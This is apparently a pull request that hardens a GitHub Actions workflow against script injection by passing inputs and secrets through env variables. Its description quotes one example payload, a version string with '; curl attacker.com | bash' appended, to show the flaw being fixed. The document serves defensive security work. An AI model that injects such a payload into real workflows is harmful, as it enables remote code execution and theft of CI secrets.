### PR TITLE
fix: Security finding in update-claud-repo workflow

### DIFF
--- a/.github/workflows/update-cloud-repo.yml
+++ b/.github/workflows/update-cloud-repo.yml
@@ -27,11 +27,14 @@ jobs:
     runs-on: ubuntu-latest
     steps:
       - name: Set REPO_URL
+        env:
+          INPUT_REPO_URL: ${{ inputs.repo_url }}
+          GH_TEMPORARY_TOKEN: ${{ secrets.GH_TEMPORARY_TOKEN }}
         run: |
-          if [ -z "${{ inputs.repo_url }}" ]; then
-            REPO_URL="https://${{ secrets.GH_TEMPORARY_TOKEN }}@github.com/SAP-samples/cloud-commerce-sample-setup.git"
+          if [ -z "$INPUT_REPO_URL" ]; then
+            REPO_URL="https://${GH_TEMPORARY_TOKEN}@github.com/SAP-samples/cloud-commerce-sample-setup.git"
           else
-            REPO_URL="${{ inputs.repo_url }}"
+            REPO_URL="$INPUT_REPO_URL"
           fi
           echo "REPO_URL=$REPO_URL" >> $GITHUB_ENV
       - name: Extract REPO_NAME from REPO_URL
@@ -42,6 +45,9 @@ jobs:
       - name: Checkout repository
         uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd #v6.0.2
       - name: Create storefronts
+        env:
+          INPUT_VERSION: ${{ github.event.inputs.version }}
+          INPUT_NPM_TOKEN: ${{ github.event.inputs.npm_token }}
         run: |
           function setup_config_dir() {
             [ -d "${CONFIG_DIR}" ]
@@ -50,8 +56,8 @@ jobs:
 
           function update_config() {
             local storefront_type=$1
-            local version=${{ github.event.inputs.version }}
-            local npm_token=${{ github.event.inputs.npm_token }}
+            local version="$INPUT_VERSION"
+            local npm_token="$INPUT_NPM_TOKEN"
 
             # Update configuration values
             if [ "${storefront_type}" == "b2c" ]; then
@@ -73,7 +79,7 @@ jobs:
 
           # Rename the generated spartacus folders so we can have B2C and B2B folders
           function rename_spartacus_folders() {
-            local version=${{ github.event.inputs.version }}
+            local version="$INPUT_VERSION"
 
             if [ "${storefront_type}" == "b2c" ]; then
               mv ../spartacus-${version} ../spartacus-${version}-b2c
@@ -107,7 +113,7 @@ jobs:
               exit 1
             fi
 
-            local file_location="../spartacus-${{ github.event.inputs.version }}-${storefront_type}/apps/${path}/src/app/spartacus/spartacus-configuration.module.ts"
+            local file_location="../spartacus-${INPUT_VERSION}-${storefront_type}/apps/${path}/src/app/spartacus/spartacus-configuration.module.ts"
             if [ -f "${file_location}" ]; then
               sed -i 's/baseUrl/\/\/baseUrl/1' "${file_location}"
               echo "Modified ${file_location}."
@@ -133,30 +139,32 @@ jobs:
           git config --global user.email "github-actions[bot]@users.noreply.github.com"
           git config --global user.name "github-actions[bot]"
       - name: Commit changes
+        env:
+          INPUT_VERSION: ${{ github.event.inputs.version }}
         run: |
           function clone_and_setup_repo() {
-            git clone ${{ env.REPO_URL }}
-            cd ${{ env.REPO_NAME }}
+            git clone "$REPO_URL"
+            cd "$REPO_NAME"
 
             # Get the current date and time
             timestamp=$(date +%Y%m%d%H%M%S)
-            
+
             # Create a new branch with a unique name
             branch_name="update_storefronts_$timestamp"
             git checkout -b $branch_name
 
             # Copy over the B2C and B2B content to the js-storefront folder and then commit the changes
             rm -rf js-storefront/spartacusstore/*
-            cp -r ./../../spartacus-${{ github.event.inputs.version }}-b2c/apps/spartacusstore/* js-storefront/spartacusstore/
+            cp -r "./../../spartacus-${INPUT_VERSION}-b2c/apps/spartacusstore/"* js-storefront/spartacusstore/
             git add .
             git commit -m "Updated content of js-storefront/spartacusstore"
 
             rm -rf js-storefront/b2bspastore/*
-            cp -r ./../../spartacus-${{ github.event.inputs.version }}-b2b/apps/b2bspastore/* js-storefront/b2bspastore/
+            cp -r "./../../spartacus-${INPUT_VERSION}-b2b/apps/b2bspastore/"* js-storefront/b2bspastore/
             git add .
             git commit -m "Updated content of js-storefront/b2bspastore"
 
-            git push -u ${{ env.REPO_URL }}
+            git push -u "$REPO_URL"
           }
 
           clone_and_setup_repo
@@ -164,9 +172,11 @@ jobs:
           # Echo the branch name so it can be used in later steps
           echo "branch_name=$branch_name" >> $GITHUB_ENV
       - name: Create Pull Request
+        env:
+          GH_TEMPORARY_TOKEN: ${{ secrets.GH_TEMPORARY_TOKEN }}
         run: |
-          curl -X POST -H "Authorization: token ${{ secrets.GH_TEMPORARY_TOKEN }}" -H "Accept: application/vnd.github.v3+json" \
-            https://api.github.com/repos/SAP-samples/${{ env.REPO_NAME}}/pulls \
+          curl -X POST -H "Authorization: token ${GH_TEMPORARY_TOKEN}" -H "Accept: application/vnd.github.v3+json" \
+            "https://api.github.com/repos/SAP-samples/${REPO_NAME}/pulls" \
             -d '{
               "title": "Update js-storefronts content",
               "body": "This PR updates the content of the js-storefronts.",


### PR DESCRIPTION
Closes 3.1 in https://jira.tools.sap/browse/CXSPA-13068

## The problem

The workflow used `${{ inputs.version }}`, `${{ inputs.npm_token }}`, `${{ inputs.repo_url }}`, and `${{ secrets.GH_TEMPORARY_TOKEN }}` directly inside `run:` shell scripts. GitHub Actions evaluates these expressions *before* the shell executes the script, substituting the raw values verbatim into the script text. A malicious input value (e.g. a version string containing `; curl attacker.com | bash`) would be injected into and executed as shell code — a classic script injection vulnerability.

## The fix

Secrets and user-controlled inputs are now passed to shell steps via the `env:` block (e.g. `INPUT_VERSION`, `INPUT_NPM_TOKEN`, `GH_TEMPORARY_TOKEN`) and referenced as shell variables (`$INPUT_VERSION`, `${GH_TEMPORARY_TOKEN}`). Because environment variables are passed out-of-band, their values are never interpolated into the script source, so no injection is possible regardless of what the input contains. This is the pattern recommended by GitHub's own security hardening guide.
 